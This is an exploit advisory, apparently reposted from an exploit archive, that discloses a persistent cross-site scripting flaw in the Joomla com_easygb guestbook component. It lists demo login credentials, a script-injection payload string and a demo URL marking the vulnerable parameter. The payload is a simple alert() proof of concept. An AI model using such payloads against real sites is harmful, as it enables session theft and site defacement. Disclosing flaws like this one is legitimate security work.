Joomla Component com_easygb Cross Site Scripting Vulnerability
2010-06-12 13:04:41Author: L0rd CrusAd3r aka VSN [[email protected]]
Exploit Title:Joomla Persistent XSS Vulnerable
Published: 2010-06-08
Vendor url:http://www.joomla-addons.org/
Platform: Unix, Linux , Windows
Greetz to:Sid3^effects, aa_Numb, M4n0, D4rk Blu3, KD and to all ICW members
#############################################################################################################################################################################
DESCRIPTION:
Contains Persistent XSS on Joomla
###############################################################################################################################################################################
Vulnerability:
Username: demo
Password: demo
The Site contain Persistent XSS Vulnerable on Guest Book
demo URL:-
Parameter:'"--><script>alert(0x000872)</script>
http:http://demo.joomla-addons.org/index.php?option=com_easygb&Itemid=6[XSS]
################################################################################################################################################################################
--
With R3gards,
L0rd CrusAd3r
Fixes
No fixesPer poter inviare un fix è necessario essere utenti registrati.